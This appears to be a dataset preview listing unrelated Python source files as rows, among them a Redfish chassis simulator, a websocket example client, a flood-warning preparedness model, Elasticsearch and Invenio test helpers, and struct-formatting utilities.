content
stringlengths 5
1.05M
|
---|
import tensorflow as tf
def rl_train():
def main():
if __name__=='__main__':
main() |
from bitstream import *
from bitstring import *
import string
conv_64_to_40('../../../scripts/test_vector.dat', 'test_vector.dat')
conv_64_to_page('../../../scripts/test_vector.dat', 'test_vector.page')
conv_page_to_66('test_vector.page', 'test_vector.66b')
conv_64_to_66('../../../scripts/test_vector.dat', 'ref_66.dat')
|
# Copyright Notice:
# Copyright 2018 Dell, Inc. All rights reserved.
# License: BSD License. For full license text see link: https://github.com/RedDrum-Redfish-Project/RedDrum-Simulator/LICENSE.txt
# BullRed-RackManager chassisBackend resources
#
class RdChassisBackend():
# class for backend chassis resource APIs
def __init__(self,rdr):
self.version=1
self.rdr=rdr
# update resourceDB and volatileDict properties
def updateResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
#self.rdr.logMsg("DEBUG","--------BACKEND updateResourceDBs. updateStaticProps={}".format(updateStaticProps))
# for the simulator, just return--the front-end databases are not updated by the current SIM backend
return(0,False)
# Reset Chassis sled
# resetType is a property string (not a dict)
def doChassisReset(self,chassisid,resetType):
self.rdr.logMsg("DEBUG","--------BACKEND chassisReset: chassisid: {}, resetType: {}".format(chassisid,resetType))
# Simulator: set powerState as a function of resetType
powerOnStates = ["On", "GracefulRestart", "ForceRestart", "ForceOn", "PowerCycle"]
powerOffStates = ["ForceOff","GracefulShutdown" ]
if resetType in powerOnStates:
newPowerState = "On"
elif resetType in powerOffStates:
newPowerState = "Off"
else:
newPowerState = None # dont change it
# Simulator: set powerState to reseat powerstate for this chassis
if newPowerState is not None:
if "Volatile" in self.rdr.root.chassis.chassisDb[chassisid]:
if "PowerState" in self.rdr.root.chassis.chassisDb[chassisid]["Volatile"]:
self.rdr.root.chassis.chassisVolatileDict[chassisid]["PowerState"] = newPowerState
# xg TODO: set power-state for any down-stream chassis that this chassis powers to same value
# xg for now, just set the power state and don't worry about it
# Simulator: set powerState to reseat powerstate for any system that this chassis is a part of
# If the chassis is a jbod sled, this may not be totally correct, but is all we can do with current model
if "ComputerSystems" in self.rdr.root.chassis.chassisDb[chassisid]:
for systemid in self.rdr.root.chassis.chassisDb[chassisid]["ComputerSystems"]:
if systemid in self.rdr.root.systems.systemsDb:
if "Volatile" in self.rdr.root.systems.systemsDb[systemid]:
if "PowerState" in self.rdr.root.systems.systemsDb[systemid]["Volatile"]:
self.rdr.root.systems.systemsVolatileDict[systemid]["PowerState"] = newPowerState
return(0)
# Reseat Chassis sled
def doChassisOemReseat(self, chassisid):
self.rdr.logMsg("DEBUG","--------BACKEND chassisReseat: chassisid: {} ".format(chassisid))
# Simulator: set powerState to reseat powerstate for this chassis
# only a leaf chassis (sled) can be reseated
if "Volatile" in self.rdr.root.chassis.chassisDb[chassisid]:
if "PowerState" in self.rdr.root.chassis.chassisDb[chassisid]["Volatile"]:
self.rdr.root.chassis.chassisVolatileDict[chassisid]["PowerState"] = self.rdr.backend.powerOnState
# Simulator: set powerState to reseat powerstate for any system that this chassis is a part of
# If the chassis is a jbod sled, this may not be totally correct, but is all we can do with current model
if "ComputerSystems" in self.rdr.root.chassis.chassisDb[chassisid]:
for systemid in self.rdr.root.chassis.chassisDb[chassisid]["ComputerSystems"]:
if systemid in self.rdr.root.systems.systemsDb:
if "Volatile" in self.rdr.root.systems.systemsDb[systemid]:
if "PowerState" in self.rdr.root.systems.systemsDb[systemid]["Volatile"]:
self.rdr.root.systems.systemsVolatileDict[systemid]["PowerState"] = self.rdr.backend.powerOnState
return(0)
# DO Patch to chassis (IndicatorLED, AssetTag)
# patchData is a dict with one property
# the front-end will send an individual call for IndicatorLED and AssetTag
def doPatch(self, chassisid, patchData):
# the front-end has already validated that the patchData and chassisid is ok
# so just send the request here
self.rdr.logMsg("DEBUG","--------BACKEND Patch chassis data. patchData={}".format(patchData))
# for the simulator, just return--the front-end databases are not updated by the current SIM backend
return(0)
# update Temperatures resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateTemperaturesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateTemperaturesResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update Fans resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateFansResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateFansResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update Voltages resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateVoltagesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateVoltagesResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update PowerControl resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updatePowerControlResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updatePowerControlResourceDBs. ")
resDb=self.rdr.root.chassis.powerControlDb[chassisid]
resVolDb=self.rdr.root.chassis.powerControlVolatileDict[chassisid]
updatedResourceDb=False
rc=0 # 0=ok
return(rc,updatedResourceDb)
# DO Patch to chassis PowerControl
# the front-end will send an individual call for each property
def patchPowerControl(self, chassisid, patchData):
self.rdr.logMsg("DEBUG","--------BACKEND Patch chassis PowerControl data. patchData={}".format(patchData))
# just call the dbus call to set the prop
return(0)
# update PowerSupplies resourceDB and volatileDict properties
# updated volatiles: LineInputVoltage, LastPowerOutputWatts, Status
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updatePowerSuppliesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updatePowerSuppliesResourceDBs. updateStaticProps={}".format(updateStaticProps))
resDb=self.rdr.root.chassis.powerSuppliesDb[chassisid]
resVolDb=self.rdr.root.chassis.powerSuppliesVolatileDict[chassisid]
return (0,False)
|
# HTTP status codes
HTTP_200_OK = 200
HTTP_201_CREATED = 201
HTTP_204_NO_CONTENT = 204
HTTP_404_NOT_FOUND = 404
HTTP_405_METHOD_NOT_ALLOWED = 405
HTTP_409_CONFLICT = 409
|
"""Part of Nussschale.
MIT License
Copyright (c) 2017-2018 LordKorea
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Module Deadlock Guarantees:
When the mutex of the configuration is locked no other locks can be
requested. Thus the configuartion lock can not be part of any deadlock.
"""
from json import dump, load
from os.path import exists
from threading import RLock
from typing import Dict, TypeVar, Union, cast
from nussschale.util.locks import mutex
# Type for configuration values
T = TypeVar("T", str, int, bool)
class Config:
"""Manages the JSON configuration file."""
# The configuration file where keys and values will be stored
_CONFIG_FILE = "./data/nussschale.json"
def __init__(self) -> None:
"""Constructor."""
# MutEx for configuration access.
# Locking this MutEx can't cause any other MutExes to be locked.
self._lock = RLock()
# The configuration cache which keeps the configuration in memory
self._configuration = {} # type: Dict[str, Union[str, int, bool]]
# Create file, if not exists
if not exists(Config._CONFIG_FILE):
with open(Config._CONFIG_FILE, "w") as f:
dump(self._configuration, f, indent=4, sort_keys=True)
# Get configuration
with open(Config._CONFIG_FILE, "r") as f:
self._configuration = cast(Dict[str, Union[str, int, bool]],
load(f))
@mutex
def get(self, key: str, default: T) -> T:
"""Gets the value for the given configuration key.
If the configuration key has no associated value then a default value
will be set.
Args:
key: The configuration key.
default: The default value for the configuration key.
Returns:
The value of the configuration key (or the default).
Contract:
This method locks the configuration lock.
"""
# Set the default and write-back
if key not in self._configuration:
self._configuration[key] = default
with open(Config._CONFIG_FILE, "w") as f:
dump(self._configuration, f, indent=4, sort_keys=True)
val = cast(T, self._configuration[key]) # type: T
return val
|
'''
This interactive WebSocket client allows the user to send frames to a WebSocket
server, including text message, ping, and close frames.
To use SSL/TLS: install the `trustme` package from PyPI and run the
`generate-cert.py` script in this directory.
'''
import argparse
import logging
import pathlib
import ssl
import sys
import urllib.parse
import trio
from trio_websocket import open_websocket_url, ConnectionClosed, HandshakeError
logging.basicConfig(level=logging.DEBUG)
here = pathlib.Path(__file__).parent
def commands():
''' Print the supported commands. '''
print('Commands: ')
print('send <MESSAGE> -> send message')
print('ping <PAYLOAD> -> send ping with payload')
print('close [<REASON>] -> politely close connection with optional reason')
print()
def parse_args():
''' Parse command line arguments. '''
parser = argparse.ArgumentParser(description='Example trio-websocket client')
parser.add_argument('--heartbeat', action='store_true',
help='Create a heartbeat task')
parser.add_argument('url', help='WebSocket URL to connect to')
return parser.parse_args()
async def main(args):
''' Main entry point, returning False in the case of logged error. '''
if urllib.parse.urlsplit(args.url).scheme == 'wss':
# Configure SSL context to handle our self-signed certificate. Most
# clients won't need to do this.
try:
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(here / 'fake.ca.pem')
except FileNotFoundError:
logging.error('Did not find file "fake.ca.pem". You need to run'
' generate-cert.py')
return False
else:
ssl_context = None
try:
logging.debug('Connecting to WebSocket…')
async with open_websocket_url(args.url, ssl_context) as conn:
await handle_connection(conn, args.heartbeat)
except HandshakeError as e:
logging.error('Connection attempt failed: %s', e)
return False
async def handle_connection(ws, use_heartbeat):
''' Handle the connection. '''
logging.debug('Connected!')
try:
async with trio.open_nursery() as nursery:
if use_heartbeat:
nursery.start_soon(heartbeat, ws, 1, 15)
nursery.start_soon(get_commands, ws)
nursery.start_soon(get_messages, ws)
except ConnectionClosed as cc:
reason = '<no reason>' if cc.reason.reason is None else '"{}"'.format(
cc.reason.reason)
print('Closed: {}/{} {}'.format(cc.reason.code, cc.reason.name, reason))
async def heartbeat(ws, timeout, interval):
'''
Send periodic pings on WebSocket ``ws``.
Wait up to ``timeout`` seconds to send a ping and receive a pong. Raises
``TooSlowError`` if the timeout is exceeded. If a pong is received, then
wait ``interval`` seconds before sending the next ping.
This function runs until cancelled.
:param ws: A WebSocket to send heartbeat pings on.
:param float timeout: Timeout in seconds.
:param float interval: Interval between receiving pong and sending next
ping, in seconds.
:raises: ``ConnectionClosed`` if ``ws`` is closed.
:raises: ``TooSlowError`` if the timeout expires.
:returns: This function runs until cancelled.
'''
while True:
with trio.fail_after(timeout):
await ws.ping()
await trio.sleep(interval)
async def get_commands(ws):
''' In a loop: get a command from the user and execute it. '''
while True:
cmd = await trio.to_thread.run_sync(input, 'cmd> ',
cancellable=True)
if cmd.startswith('ping'):
payload = cmd[5:].encode('utf8') or None
await ws.ping(payload)
elif cmd.startswith('send'):
message = cmd[5:] or None
if message is None:
logging.error('The "send" command requires a message.')
else:
await ws.send_message(message)
elif cmd.startswith('close'):
reason = cmd[6:] or None
await ws.aclose(code=1000, reason=reason)
break
else:
commands()
# Allow time to receive response and log print logs:
await trio.sleep(0.25)
async def get_messages(ws):
''' In a loop: get a WebSocket message and print it out. '''
while True:
message = await ws.get_message()
print('message: {}'.format(message))
if __name__ == '__main__':
try:
if not trio.run(main, parse_args()):
sys.exit(1)
except (KeyboardInterrupt, EOFError):
print()
|
# -*- coding: utf-8 -*-
###############################################################################
# PREP-FEWS
# Social Preparedness in Early Warning Systems model
#
# Model modules
#
# Marc Girons Lopez, Giuliano di Baldassarre, Jan Seibert
###############################################################################
import os
import numpy as np
import pandas as pd
from scipy import stats
from collections import Counter
###############################################################################
# FORECASTING SYSTEM
###############################################################################
class ForecastingSystem(object):
"""Define the technical capabilities, in terms of precision and accuracy,
of a flood forecasting system.
"""
def __init__(self, acc_mean, acc_sd, prc_shape, prc_scale):
""" Initialize the class with the parameter values
"""
self.mean = acc_mean
self.sd = acc_sd
self.shape = prc_shape
self.scale = prc_scale
def issue_forecast(self, event):
"""Generate a random probabilistic flood forecast based on the
following conceptualization: F=N(event+N(mu,sigma),gamma(shape,scale)).
Returns a tuple with the mean and sd of the forecast.
"""
deviation = np.random.normal(loc=self.mean, scale=self.sd)
mean = event + deviation
sd = np.random.gamma(shape=self.shape, scale=self.scale)
return (mean, sd)
###############################################################################
# WARNING ASSESSMENT
###############################################################################
class WarningAssessment(object):
"""Assess the outcome of the flood warning system based on a simple
contingency table drawing from decisions on the flood magnitude at and
from which warnings are to be issued (mag_thr) and the required
likelihood of the forecast for warning to be issued (prob_thr).
"""
def __init__(self, mag_thr, prob_thr):
""" Initialize the class with the parameter values
"""
self.mag_thr = mag_thr
self.prob_thr = prob_thr
def assess_warning_outcome(self, event, forecast):
"""Define the contingency table used for evaluating the warnings.
Returns a string describing the warning outcome
"""
cdf = stats.norm(loc=forecast[0], scale=forecast[1]).cdf(self.mag_thr)
aep = 1. - cdf # annual exceedance probability
if event < self.mag_thr and aep < self.prob_thr:
return 'true negative' # all clear
elif event < self.mag_thr and aep >= self.prob_thr:
return 'false positive' # false alarm
elif event >= self.mag_thr and aep < self.prob_thr:
return 'false negative' # missed event
elif event >= self.mag_thr and aep >= self.mag_thr:
return 'true positive' # hit, successful alarm
###############################################################################
# LOSS ESTIMATION
###############################################################################
class LossEstimation(object):
"""Define how the different warning outcomes and preparedness level affect
the losses incurred by the system
"""
def __init__(self, dmg_thr, dmg_shape, res_dmg, mit_cst):
"""initialize the class with the parameters values
"""
self.dmg_thr = dmg_thr
self.dmg_shape = dmg_shape
self.res_dmg = res_dmg
self.mit_cst = mit_cst
def estimate_damage(self, event):
"""Calculate the damage produced by a flood event of a
specified mangitude.
Returns a float representing the damage magnitude.
"""
if event < self.dmg_thr:
return 0.
else:
return 1. - np.exp(-((event - self.dmg_thr) / self.dmg_shape))
def estimate_residual_damage(self, damage, preparedness):
"""Calculate the residual damage given a specific disaster damage
magnitude and preparedness level.
Returns a float representing the residual damage magnitude
"""
dmg_fun = np.log(1 / self.res_dmg)
return damage * np.exp(- dmg_fun * preparedness)
def get_warning_damage(self, event, warning_outcome, preparedness):
"""Calculate the flood-related damages for the different warning
outcomes after a flood event has taken place.
Returns a float representing the damage magnitude.
"""
if warning_outcome == 'true positive':
damage = self.estimate_damage(event)
return self.estimate_residual_damage(damage, preparedness)
else:
return self.estimate_damage(event)
def get_warning_loss(self, event, warning_outcome, preparedness):
"""Calculate the flood-related losses (damage + costs) for the
different warning outcomes after a flood event has taken place.
Returns a float representing the loss magnitude.
"""
damage = self.estimate_damage(event)
if warning_outcome == 'true positive':
residual_damage = self.estimate_residual_damage(damage, preparedness)
return residual_damage + event * self.mit_cst
elif warning_outcome == 'false positive':
return damage + event * self.mit_cst
else:
return damage
###############################################################################
# DISASTER PREPAREDNESS
###############################################################################
class SocialPreparedness(object):
"""Assess the disaster preparedness level as a function of
the recency of flood events.
"""
def __init__(self, shock, half_life):
# set parameters
self.shock = shock
# calculate the decay constants as a function of the half-life
self.decay_ct = np.log(2) / half_life
def update_preparedness(self, damage, preparedness):
"""Calculate the impact of the different warning outcomes on the
disaster preparedness level.
Returns a float (0,1] representing the degree of preparedness.
"""
if damage == 0.:
prep_tmp = preparedness - self.decay_ct * preparedness
else:
prep_tmp = preparedness + self.shock * damage
# minimum preparedness value is 1%, set it as a variable?
return np.clip(prep_tmp, 0.01, 1.)
###############################################################################
# MODEL EVALUATION
###############################################################################
class ModelEvaluation(object):
"""Assess the efficiency of the model according to different
metrics.
"""
def __init__(self):
self.tn = None
self.fn = None
self.fp = None
self.tp = None
def count_warning_outcomes(self, outcome_ls):
"""Calculate the number of occurrences of each warning outcome in the
time series.
Returns a float for each warning outcome.
"""
count = Counter(outcome_ls)
self.tn = count['true negative']
self.fn = count['false negative']
self.fp = count['false positive']
self.tp = count['true positive']
def flood_frequency(self):
"""Calculate the frequency of occurrence of flood events.
Returns a float representing the disaster frequency [0, 1]
"""
return (self.tp + self.fn) / (self.tn + self.fn + self.fp + self.tp)
def return_period(self):
"""Calculate the return period of flood events.
Returns a float representing the return period in years.
"""
if self.tp + self.fn == 0.:
# raise ValueError('No flood events recorded in the time series.')
return None
else:
return (self.tn + self.fn + self.fp + self.tp + 1) / (self.tp + self.fn)
def hit_rate(self):
"""Calculate the hit rate (probability of detection)
of the warning system.
Returns a float representing the hit rate [0, 1]
"""
if self.fn + self.tp == 0.:
# raise ValueError('No flood events recorded in the time series.')
return None
else:
return self.tp / (self.fn + self.tp)
def false_alarm_rate(self):
"""Calculate the false alarm rate (probability of false detection)
for the warning system.
Returns a float representing the false alarm rate [0, 1]
"""
if self.tn + self.fp == 0.:
# raise ValueError('No normal events recorded in the time series.')
return None
else:
return self.fp / (self.tn + self.fp)
def false_alarm_ratio(self):
"""Calculate the false alarm ratio for the warning system.
Returns a float representing the false alarm ratio [0, 1]
"""
if self.fp + self.tp == 0.:
# raise ValueError('No alarms were raised during these period.')
return None
else:
return self.fp / (self.fp + self.tp)
def relative_loss(self, climate_loss_ls, warning_loss_ls):
"""Calculate the relative loss produced by the mitigation measures.
Returns a float representing the relative loss [0, 1]
"""
# check if there is any non-null element in the list
if any(climate_loss_ls) is False:
# raise ValueError('No flood events produced losses to the system.')
return None
else:
return sum(warning_loss_ls) / sum(climate_loss_ls)
def calculate_statistics(self, outcome_ls, climate_loss_ls,
warning_loss_ls, preparedness_ls):
"""Calculate the statistics for the model output
"""
self.count_warning_outcomes(outcome_ls)
self.stats = {'Probability of occurrence': self.flood_frequency(),
'Return period (yrs)': self.return_period(),
'Hit rate': self.hit_rate(),
'False alarm rate': self.false_alarm_rate(),
'False alarm ratio': self.false_alarm_ratio(),
'Relative loss': self.relative_loss(climate_loss_ls,
warning_loss_ls),
'Average preparedness': np.average(preparedness_ls)
}
def save_statistics(self, statfile, mode='single_run'):
"""write the statistics to the output file
"""
path_out = os.getcwd() + '\\..\\output\\' + mode + '\\'
if not os.path.exists(path_out):
os.makedirs(path_out)
if mode == 'single_run':
df = pd.DataFrame.from_dict(self.stats, orient='index')
df.to_csv(path_out + statfile, sep='\t', header=False)
elif mode == 'monte_carlo':
self.mc_stats.to_csv(path_out + statfile, index=False) |
#
# Copyright 2019-2020 Lukas Schmelzeisen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import csv
from datetime import datetime
from pathlib import Path
from typing import Iterator, Mapping, MutableMapping
from elasticsearch_dsl import Date, Float, Keyword, Text
from nasty_data import BaseDocument
from nasty_utils import DecompressingTextIOWrapper
from typing_extensions import Final
_INDEX_OPTIONS: Final[str] = "offsets"
_INDEX_PHRASES: Final[bool] = False
_INDEX_TERM_VECTOR: Final[str] = "with_positions_offsets"
class MaxqdaCodedNastyDocument(BaseDocument):
document_group = Keyword()
code_identifier = Keyword()
lang = Keyword()
created_at = Date()
code = Keyword()
segment = Text(
index_options=_INDEX_OPTIONS,
index_phrases=_INDEX_PHRASES,
term_vector=_INDEX_TERM_VECTOR,
analyzer="standard",
)
coverage = Float()
@classmethod
def prepare_doc_dict(cls, doc_dict: MutableMapping[str, object]) -> None:
super().prepare_doc_dict(doc_dict)
doc_dict.pop("Farbe")
doc_dict.pop("Kommentar")
doc_dict["document_group"] = doc_dict.pop("Dokumentgruppe")
doc_dict["created_at"] = datetime.strptime(
doc_dict.pop("Dokumentname"), "%d.%m.%Y %H:%M:%S"
)
doc_dict["_id"] = (
str(doc_dict["code_identifier"]) + "-" + str(doc_dict.pop("i"))
)
doc_dict["code"] = doc_dict.pop("Code")
doc_dict["segment"] = doc_dict.pop("Segment")
doc_dict["coverage"] = float(doc_dict.pop("Abdeckungsgrad %"))
def load_document_dicts_from_maxqda_coded_nasty_csv(
file: Path,
code_identifier: str,
lang: str,
progress_bar: bool = True,
) -> Iterator[Mapping[str, object]]:
with DecompressingTextIOWrapper(
file, encoding="UTF-8", warn_uncompressed=False, progress_bar=progress_bar
) as fin:
reader = csv.DictReader(fin)
for i, document_dict in enumerate(reader):
document_dict["i"] = i
document_dict["code_identifier"] = code_identifier
document_dict["lang"] = lang
yield document_dict
|
# Name: Reetesh Zope
# Student ID: 801138214
# Email ID: [email protected]
"""
main.py
_______
- Takes network file input from command line containing - <source> <destination> <transmission time>
- Accepts user queries and does network operations accordingly on the network graph
"""
from graph import Graph
def main():
graphObj = Graph()
while True:
command = input("")
command = command.strip().split(" ")
if command[0] == "addedge":
graphObj.addEdge(command[1], command[2], command[3])
elif command[0] == "path":
graphObj.findShortestPath(command[1], command[2])
elif command[0] == "deleteedge":
graphObj.deleteEdge(command[1], command[2])
elif command[0] == "edgedown":
graphObj.takeEdgeUpOrDown(command[1], command[2], False)
elif command[0] == "edgeup":
graphObj.takeEdgeUpOrDown(command[1], command[2], True)
elif command[0] == "vertexdown":
graphObj.takeVertexUpOrDown(command[1], False)
elif command[0] == "vertexup":
graphObj.takeVertexUpOrDown(command[1], True)
elif command[0] == "reachable":
graphObj.printReachables()
elif command[0] == "print":
graphObj.printGraph()
elif command[0] == "graph":
fin = command[1]
with open(fin) as f:
edges = f.readlines()
graphObj.createGraph(edges)
elif command[0] == "quit":
break
else:
print("Invalid query")
if __name__=="__main__":
main()
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest configuration."""
from __future__ import absolute_import, print_function
import os
import shutil
import sys
import tempfile
import pytest
from flask import Flask
from invenio_db import InvenioDB
from sqlalchemy_utils.functions import create_database, database_exists, \
drop_database
from invenio_search import InvenioSearch
sys.path.append(
os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'tests/mock_module'))
@pytest.fixture()
def app():
"""Flask application fixture."""
# Set temporary instance path for sqlite
instance_path = tempfile.mkdtemp()
app = Flask('testapp', instance_path=instance_path)
app.config.update(
TESTING=True
)
InvenioSearch(app)
with app.app_context():
yield app
# Teardown instance path.
shutil.rmtree(instance_path)
def mock_iter_entry_points_factory(data, mocked_group):
"""Create a mock iter_entry_points function."""
from pkg_resources import iter_entry_points
def entrypoints(group, name=None):
if group == mocked_group:
for entrypoint in data:
yield entrypoint
else:
for x in iter_entry_points(group=group, name=name):
yield x
return entrypoints
@pytest.fixture()
def template_entrypoints():
"""Declare some events by mocking the invenio_stats.events entrypoint.
It yields a list like [{event_type: <event_type_name>}, ...].
"""
eps = []
for idx in range(5):
event_type_name = 'mock_module'
from pkg_resources import EntryPoint
entrypoint = EntryPoint(event_type_name, event_type_name)
entrypoint.load = lambda: lambda: ['mock_module.templates']
eps.append(entrypoint)
entrypoints = mock_iter_entry_points_factory(
eps, 'invenio_search.templates')
return entrypoints
|
import json, os
from azure.storage.queue import (
QueueService,
QueueMessageFormat
)
import azure.functions as func
from NewDeclarationInQueue.formular_converter import FormularConverter
from NewDeclarationInQueue.preprocess.document_location import DocumentLocation
from NewDeclarationInQueue.preprocess.ocr_constants import OcrConstants
from NewDeclarationInQueue.preprocess_two_steps import PreProcessTwoSteps
from NewDeclarationInQueue.processfiles.ocr_worker import OcrWorker
from NewDeclarationInQueue.processfiles.process_messages import ProcessMessages
def main(msg: func.QueueMessage) -> None:
message_str = msg.get_body().decode('utf-8')
data = json.loads(message_str)
two_steps = PreProcessTwoSteps()
process_messages = ProcessMessages('OCR Process', msg.id)
ocr_constants = two_steps.get_constats()
ocr_file, process_messages = two_steps.get_file_info(data, process_messages)
# TODO: this has to be done later, based on what the composite model returns
# TODO: including when it returns a document it does not recognize
#formular_converter = FormularConverter()
#ocr_formular = formular_converter.get_formular_info(ocr_constants, ocr_file)
#TODO: point of divergence, here call a method that uses the composite model
#process_messages = two_steps.process_document(ocr_file, ocr_constants, ocr_formular, process_messages)
process_messages = two_steps.process_document_with_custom_model(ocr_file, ocr_constants, process_messages)
two_steps.save_in_output_queue(data, process_messages)
|
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
print([1, 2, 3, 2].index(2)) # => 1
print([i for i, value in enumerate([1, 2, 3, 2, 4, 2]) if value == 2]) # => [1, 3, 5]
print([1, 2, 3, 2, 4, 2].count(2)) # => 3
programmers = {"Michael": "Python",
"Tim": "C++",
"Karthi": "Java"}
if "Karthi" in programmers.keys():
print("Karthi is here")
# Python-Kurzform
if "Karthi" in programmers:
print("Karthi is here II")
if "C++" in programmers.values():
print("someone knows C++")
if ("Michael", "Python") in programmers.items():
print("Michael knows Python")
print(all([7, 2] in [2, 3, 5, 7, 9]))
print(any([7, 2] in [2, 3, 5, 7, 9]))
print(any([4] in [2, 3, 5, 7, 9]))
# Alternative mit mehr Flexibilität
print(all(elem in [2, 3, 5, 7, 9] for elem in [7, 2]))
print(any(elem in [2, 3, 5, 7, 9] for elem in [7, 2]))
print(any(elem in [2, 3, 5, 7, 9] for elem in [4]))
print("Hallo".rindex("l"))
print("Hallo".rfind("l"))
print("Hallo".rfind("x")) # => -1
# print("Hallo".rindex("x")) # => ValueError: substring not found
def last_index_of(values, search_for):
for pos in range(len(values) - 1, -1, -1):
if values[pos] == search_for:
return pos
return -1
print(last_index_of([1, 2, 3, 2, 4, 2, 5, 2], 2)) # => 7
values = [0] * 13
print(values)
values[2] = 7
values[7] = 2
print(values)
|
from .serval import builder
from .srv import main |
# Copyright 2019 Martin Olejar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from easy_enum import Enum
from easy_struct.base_types import IntBits, Int, Float, String, Array, Bytes
from typing import Optional, Union, Any
########################################################################################################################
# Helper functions for base DataStructure
########################################################################################################################
def loff(offset: int, tabsize: int, string: str) -> str:
return str(" " * (tabsize * offset)) + string
def prefix(offset: int, tabsize: int, name: str, align: int) -> str:
return str(" " * (tabsize * offset)) + name + ': ' + str(" " * (align - len(name)))
def size_fmt(num: int, kibibyte: bool = True) -> str:
base, suffix = [(1000., 'B'), (1024., 'iB')][kibibyte]
for x in ['B'] + [x + suffix for x in list('kMGTP')]:
if -base < num < base:
break
num /= base
return "{} {}".format(num, x) if x == 'B' else "{:3.2f} {}".format(num, x)
def fmt_int(name: str, metadata: Any, value: int, tabsize: int, offset: int, align: int) -> str:
if not isinstance(value, int):
return prefix(offset, tabsize, name, align) + str(value) + "\n"
bits = metadata.bits if hasattr(metadata, 'bits') else metadata.bytes * 8
raw_value = value & ((1 << bits) - 1) if value < 0 else value
if metadata.print_format in ('x', 'X'):
fmt = "0x{{:0{}{}}}".format(bits // 4, metadata.print_format)
msg = prefix(offset, tabsize, name, align) + fmt.format(raw_value)
elif metadata.print_format in ('o', 'O'):
msg = prefix(offset, tabsize, name, align) + "0{:o}".format(raw_value)
elif metadata.print_format in ('b', 'B'):
fmt = "0b{{:0{}b}}".format(bits)
msg = prefix(offset, tabsize, name, align) + fmt.format(name, raw_value)
elif metadata.print_format in ('z', 'Z'):
msg = prefix(offset, tabsize, name, align)
msg += "{} ({})".format(value, size_fmt(value, metadata.print_format == 'z'))
else:
msg = prefix(offset, tabsize, name, align) + str(value)
if isinstance(metadata.choices, type) and issubclass(metadata.choices, Enum):
# msg += " ({}[{}])".format(metadata.choices.__name__, metadata.choices[value])
msg += " ({})".format(metadata.choices[value])
return msg + '\n'
def fmt_bytes(name: str, metadata: Any, data: bytearray, tabsize: int = 4, offset: int = 0, line_size: int = 16) -> str:
if len(data) >= (16 ** 8):
raise ValueError("hexdump cannot process more than 16**8 or 4294967296 bytes")
fmt = "{{:0{}X}} | {{:<{}s}} | {{}}\n".format(4 if len(data) < (16 ** 4) else 8, 3 * line_size - 1)
msg = loff(offset, tabsize, "{}[{}]:\n".format(name, len(data)))
for i in range(0, len(data), line_size):
hex_text = " ".join(format(c, '02X') for c in data[i: i + line_size])
raw_text = "".join(chr(c) if 32 <= c < 128 else '.' for c in data[i: i + line_size])
msg += loff(offset + 1, tabsize, fmt.format(i, hex_text, raw_text))
if i > line_size * 10:
msg += loff(offset + 1, tabsize, "...\n")
break
return msg
def fmt_array(name: str, metadata: Any, data: list, tabsize: int = 4, offset: int = 0) -> str:
msg = str()
msg += loff(offset, tabsize, "{}[{} * {}]:\n".format(name, len(data), metadata.item_type.__class__.__name__))
msg += loff(offset + 1, tabsize, "{}\n".format(data))
return msg
def fmt_string(name: str, metadata: Any, value: str, tabsize: int, offset: int, align: int) -> str:
msg = prefix(offset, tabsize, name, align) + "\"{}\"\n".format(value)
return msg
########################################################################################################################
# Metaclass for base DataStructure
########################################################################################################################
class MetaStructure(type):
